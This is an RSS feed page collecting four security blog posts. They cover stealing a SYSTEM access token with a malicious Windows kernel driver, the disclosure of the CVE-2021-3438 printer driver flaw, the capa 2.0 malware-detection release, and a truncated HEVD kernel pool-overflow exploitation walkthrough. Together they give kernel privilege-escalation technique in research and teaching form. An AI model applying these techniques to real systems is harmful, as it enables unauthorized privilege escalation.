RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
☑ ★ ✇ SolomonSklash.io

Stealing Tokens In Kernel Mode With A Malicious Driver

By: Solomon Sklash

Stealing Tokens In Kernel Mode With A Malicious Driver

Introduction

I’ve recently been working on expanding my knowledge of Windows kernel concepts and kernel mode programming. In the process, I wrote a malicious driver that could steal the token of one process and assign it to another. This article by the prolific and ever-informative spotless forms the basis of this post. In that article he walks through the structure of the _EPROCESS and _TOKEN kernel mode structures, and how to manipulate them to change the access token of a given process, all via WinDbg. It’s a great post and I highly recommend reading it before continuing on here.

The difference in this post is that I use C++ to write a Windows kernel mode driver from scratch and a user mode program that communicates with that driver. This program passes in two process IDs, one to steal the token from, and another to assign the stolen token to. All the code for this post is available here.

About Access Tokens

A common method of escalating privileges via buggy drivers or kernel mode exploits is to the steal the access token of a SYSTEM process and assign it to a process of your choosing. However this is commonly done with shellcode that is executed by the exploit. Some examples of this can be found in the wonderful HackSys Extreme Vulnerable Driver project. My goal was to learn more about drivers and kernel programming rather than just pure exploitation, so I chose to implement the same concept in C++ via a malicious driver.

Every process has a primary access token, which is a kernel data structure that describes the rights and privileges that a process has. Tokens have been covered in detail by Microsoft and from an offensive perspective, so I won’t spend a lot of time on them here. However it is important to know how the access token structure is associated with each process.

Processes And The _EPROCESS Structure

Each process is represented in the kernel by a doubly linked list of _EPROCESS structures. This structure is not fully documented by Microsoft, but the ReactOS project as usual has a good definition of it. One of the members of this structure is called, unsurprisingly, Token. Technically this member is of type _EX_FAST_REF, but for our purposes, this is just an implementation detail. This Token member contains a pointer to the address of the token object belonging to that particular process. An image of this member within the _EPROCESS structure in WinDbg can be seen below:

Token in WinDbg

As you can see, the Token member is located at a fixed offset from the beginning of the _EPROCESS structure. This seems to change between versions of Windows, and on my test machine running Windows 10 20H2, the offset is 0x4b8.

The Method

Given the above information, the method for stealing a token and assigning it is simple. Find the _EPROCESS structure of the process we want to steal from, go to the Token member offset, save the address that it is pointing to, and copy it to the corresponding Token member of the process we want to elevate privileges with. This is the same process that Spotless performed in WinDbg.

The Driver

In lieu of exploiting a kernel mode exploit, I write a simple test driver. The driver exposes an IOCTL that can be called from user mode. It takes struct that contains two members: an unsigned long for the PID of the process to steal a token from, and an unsigned long for the PID of the process to elevate.

PID Struct

The driver will find the _EPROCESS structure for each PID, find the Token members, and copies the target process token to the destination process.

The User Mode Program

The user mode program is a simple C++ CLI application that takes two PIDs as arguments, and copies the token of the first PID to the second PID, via the exposed driver IOCTL. This is done by first opening a handle to the driver by name with CreateFileW and then calling DeviceIoControl with the correct IOCTL.

User Mode Code

The Driver Code

The code for the token copying is pretty straight forward. In the main function for handling IOCTLs, HandleDeviceIoControl, we switch on the received IOCTL. When we receive IOCTL_STEAL_TOKEN, we save the user mode buffer, extract the two PIDs, and attempt to resolve the PID of the target process to the address of its _EPROCESS structure:

IOCTL Switch

Once we have the _EPROCESS address, we can use the offset of 0x4b8 to find the Token member address:

Token Offset

We repeat the process once more for the PID of the process to steal a token from, and now we have all the information we need. The last step is to copy the source token to the target process, like so:

Copy Token

The Whole Process

Here is a visual breakdown of the entire flow. First we create a command prompt and verify who we are:

Whoami

Next we use the user mode program to pass the two PIDs to the driver. The first PID, 4, is the PID of the System process, and is usually always 4. We see that the driver was accessed and the PIDs passed to it successfully:

User Mode Program

In the debug output view, we can see that HandleDeviceIoControl is called with the IOCTL_STEAL_TOKEN IOCTL, the PIDs are processed, and the target token overwritten. Highlighted are the identical addresses of the two tokens after the copy, indicating that we have successfully assigned the token:

Copy Token Debug View

Finally we run whoami again, and see that we are now SYSTEM!

Whoami System

We can even do the same thing with another user’s token:

Whoami 2

Conclusion

Kernel mode is fun! If you’re on the offensive side of the house, it’s well worth digging into. After all, every user mode road leads to kernel space; knowing your way around can only make you a better operator, and it expands the attack surface available to you. Blue can benefit just as much, since knowing what you’re defending at a deep level will make you able to defend it more effectively. To dig deeper I highly recommend Pavel Yosifovich’s Windows Kernel Programming, the HackSys Extreme Vulnerable Driver, and of course the Windows Internals books.

☑ ★ ✇ SentinelLabs

CVE-2021-3438: 16 Years In Hiding – Millions of Printers Worldwide Vulnerable

By: Asaf Amir

Executive Summary

  • SentinelLabs has discovered a high severity flaw in HP, Samsung, and Xerox printer drivers.
  • Since 2005 HP, Samsung, and Xerox have released millions of printers worldwide with the vulnerable driver.
  • SentinelLabs’ findings were proactively reported to HP on Feb 18, 2021 and are tracked as CVE-2021-3438, marked with CVSS Score 8.8.
  • HP released a security update on May 19th to its customers to address this vulnerability.

As part of our commitment to secure the internet for all users, our researchers have engaged in an open-ended process of vulnerability discovery for targets that impact wide swaths of end users. Our research has been consistently fruitful, particularly in the area of OEM drivers[1, 2]. Many of these drivers come preloaded on devices or get silently dropped when installing some innocuous legitimate software bundle and their presence is entirely unknown to the users. These OEM drivers are often decades old and coded without concern for their potential impact on the overall integrity of those systems.

Our research approach has allowed us to proactively engage with vendors and manufacturers to patch previously unknown vulnerabilities before they can be exploited in the wild. We will continue our efforts to reduce the overall attack surface available to cunning adversaries.

Discovering an HP Printer Driver Vulnerability

Several months ago, while configuring a brand new HP printer, our team came across an old printer driver from 2005 called SSPORT.SYS thanks to an alert by Process Hacker once again.

This led to the discovery of a high severity vulnerability in HP, Xerox, and Samsung printer driver software that has remained hidden for 16 years. This vulnerability affects a very long list of over 380 different HP and Samsung printer models as well as at least a dozen different Xerox products.

The beginning of a long list of affected HP and Samsung products
A number of Xerox Products are also affected by CVE-2021-3438

Since all of these models are in fact manufactured by HP, we reported the vulnerability to them.

Technical Details

Just by running the printer software, the driver gets installed and activated on the machine regardless of whether you complete the installation or cancel.

Thus, in effect, this driver gets installed and loaded without even asking or notifying the user. Whether you are configuring the printer to work wirelessly or via a USB cable, this driver gets loaded. In addition, it will be loaded by Windows on every boot:

This makes the driver a perfect candidate to target since it will always be loaded on the machine even if there is no printer connected.

The vulnerable function inside the driver accepts data sent from User Mode via IOCTL (Input/Output Control) without validating the size parameter:

The vulnerable function inside the driver

This function copies a string from the user input using strncpy with a size parameter that is controlled by the user. Essentially, this allows attackers to overrun the buffer used by the driver.

An interesting thing we noticed while investigating this driver is this peculiar hardcoded string: "This String is from Device [email protected]@@@ ".

The hardcoded string in the vulnerable driver

It seems that HP didn’t develop this driver but copied it from a project in Windows Driver Samples by Microsoft that has almost identical functionality; fortunately, the MS sample project does not contain the vulnerability.

Impact

An exploitable kernel driver vulnerability can lead an unprivileged user to a SYSTEM account and run code in kernel mode (since the vulnerable driver is locally available to anyone). Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

Successfully exploiting a driver vulnerability might allow attackers to potentially install programs, view, change, encrypt or delete data, or create new accounts with full user rights. Weaponizing this vulnerability might require chaining other bugs as we didn’t find a way to weaponize it by itself given the time invested.

Suggestions

Generally speaking, it is highly recommended that in order to reduce the attack surface provided by device drivers with exposed IOCTLs handlers, developers should enforce strong ACLs when creating kernel device objects, verify user input and not expose a generic interface to kernel mode operations.

Remediation

This vulnerability and its remedies are described in HP Security Advisory HPSBPI03724 and Xerox Advisory Mini Bulletin XRX21K. We recommend HP/Samsung/Xerox customers, both enterprise and consumer, to apply the patch as soon as possible.

To mitigate this issue users should use this link and look for their printer model and then download the patch file as shown in the picture:

Some Windows machines may already have this driver without even running a dedicated installation file, since the driver comes with Microsoft Windows via Windows Update:

The driver is marked as “File Distributed by Microsoft” in VirusTotal

Note: Not all affected products were initially listed on the advisory page. We initially conducted a small sample test and found other products vulnerable, so we recommend further verification.

Conclusion

This high severity vulnerability, which has been present in HP, Samsung, and Xerox printer software since 2005, affects  millions of devices and likely millions of users worldwide. Similar to previous vulnerabilities we have disclosed that remained hidden for 12 years (1, 2), the impact this could have on users and enterprises that fail to patch is far-reaching and significant.

While we haven’t seen any indicators that this vulnerability has been exploited in the wild up till now, with millions of printer models currently vulnerable, it is inevitable that if attackers weaponize this vulnerability they will seek out those that have not taken the appropriate action.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

18 Feb, 2021 – Initial report.
23 Feb, 2021 – We notified HP that the same issue exists in Samsung and Xerox printers.
19 May, 2021 – HP released an advisory for CVE-2021-3438.
20 May, 2021 – We notified HP that the “affected products” listing is incomplete and provided extra information.
01 Jun, 2021 – HP updated the list of affected products.

The post CVE-2021-3438: 16 Years In Hiding – Millions of Printers Worldwide Vulnerable appeared first on SentinelLabs.

☑ ★ ✇ Threat Research

capa 2.0: Better, Faster, Stronger

By: William Ballenthin

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and checkout the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

  • New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
  • More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
  • Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
  • Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.


Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.


Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.


Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.


Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.


Figure 5: capa v1.6 results without library code recognition


Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.


Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in high-optimized routines, such as memcpy, to opt-in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time to create a comprehensive FLIRT signature set for the common malware analysis use-case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

  • From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
    • C and C++ run-time libraries
    • Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
  • The following open-source projects as compiled with VS2015, VS2017, and VS2019:
    • CryptoPP
    • curl
    • Microsoft Detours
    • Mbed TLS (previously PolarSSL)
    • OpenSSL
    • zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpgk and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

  • Host Interaction describes program functionality to interact with the file system, processes, and the registry
  • Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
  • Collection describes functionality used to steal data such as credentials or credit card information
  • Data Manipulation describes capabilities to encrypt, decrypt, and hash data
  • Communication describes data transfer techniques such as HTTP, DNS, and TCP


Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

☑ ★ ✇ Connor McGarr

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

By: Connor McGarr

Introduction

This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here starts this series out by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. Chaining this information leak vulnerability with the bug outlined in this post, which is a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why pool corruption in the age of the segment heap has had the scope of techniques, in my estimation, lessened from the days of Windows 7.

Due to the release of Windows 11 recently, which will have Virtualization-Based Security (VBS) and Hypervisor Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out new technologies in any enterprise - vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel to execute code to either data-only style attacks or to investigate more novel techniques to bypass VBS and HVCI. This is the direction I hope to start taking my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir’s upcoming BlackHat 2021 USA talk found here, Part 1 of this blog series will contain much of the prerequisite knowledge used for this blog post - so although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is determined by a processor directive to make this variable 16 on a Windows 64-bit machine, which we are testing from. We now know that the pool chunk that will be allocated from the call to ExAllocatePoolWithTag within TriggerBufferOverfloowNx is 16 bytes.

The kernel mode pool chunk, which is now allocated on the NonPagedPoolNx is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a “pool overflow” in this case.

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack on the pool overflow code to the end, after the for loop which does parsing to extract the base address of HEVD.sys. This code can be seen below, which sends a buffer of 50 bytes to the pool chunk of 16 bytes. The IOCTL for to reach the TriggerBufferOverflowNonPagedPool function is 0x0022204b

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an “integrity” check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH, which is where our allocation resides based on heuristics mentioned in Part 1, being prepended with a _POOL_HEADER structure - we have subsequently corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on on call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check again incurs. This is due to a pool chunk being freed which has an invalid header.

This validates that an out-of-bounds write does exist. The question is now, with a kASLR bypass in hand - how to we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap it to find objects, when exploiting the kLFH specifically, that are of the same size as the vulnerable object, contain an interesting member in the object, can be called from user mode, and are allocated on the same pool type as the vulnerable object. We can recall earlier that the size of the vulnerable object was 16 bytes in size. The goal here now is to look at the source code of the driver to determine if there isn’t a useful object that we can allocate which will meet all of the specified parameters above. Note again, this is the toughest part about pool exploitation is finding objects worthwhile.

Luckily, and slightly contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h, which are useful to us. As the name can specify, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver and look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn’t a way to get useful objects on the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).

As we can see, each function definition defines a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELP_OBJECT_IO object, defined in the above image!

Let’s examine ArbitraryReadWriteHelpeNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are being instantiated and leveraged in the defined functions in the above image.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELP_OBJECT_IO and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let’s inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

  1. A pointer called Name
  2. A SIZE_T variable, Length
  3. An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
  4. An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
  5. A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and allocates this memory to the previously declared pointer Name.

This newly allocated memory is then initialized to zero. The previously declared pointer, ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT, then has its Name member set to the previously declared pointer Name, which had its memory allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which grabbed the length sent by the user mode client in the IOCTL operation, via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure’s values.

Then, an array called g_ARWHelperOjbectNonPagedPoolNx, at the index specified by FreeIndex, is initialized to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, and managed such objects. This is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

NTSTATUS
CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
);

This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of another kernel mode object. This means this will be bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let’s update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on the call to ExAllocatePoolWIthTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we instantiated the buffer to zero, this is why the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag, which is 0x10 bytes (16 bytes) + 0x10 bytes for the _POOL_HEADER_ structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, there is always a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT created. We know there is also an array of these objects created and the created object for each given CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function call is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

        DbgPrint("[+] Name Length: 0x%X\n", Length);

        //
        // Get a free index
        //

        FreeIndex = GetFreeIndex();

        if (FreeIndex == STATUS_INVALID_INDEX)
        {
            //
            // Failed to get a free index
            //

            Status = STATUS_INVALID_INDEX;
            DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

            return Status;
        }

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

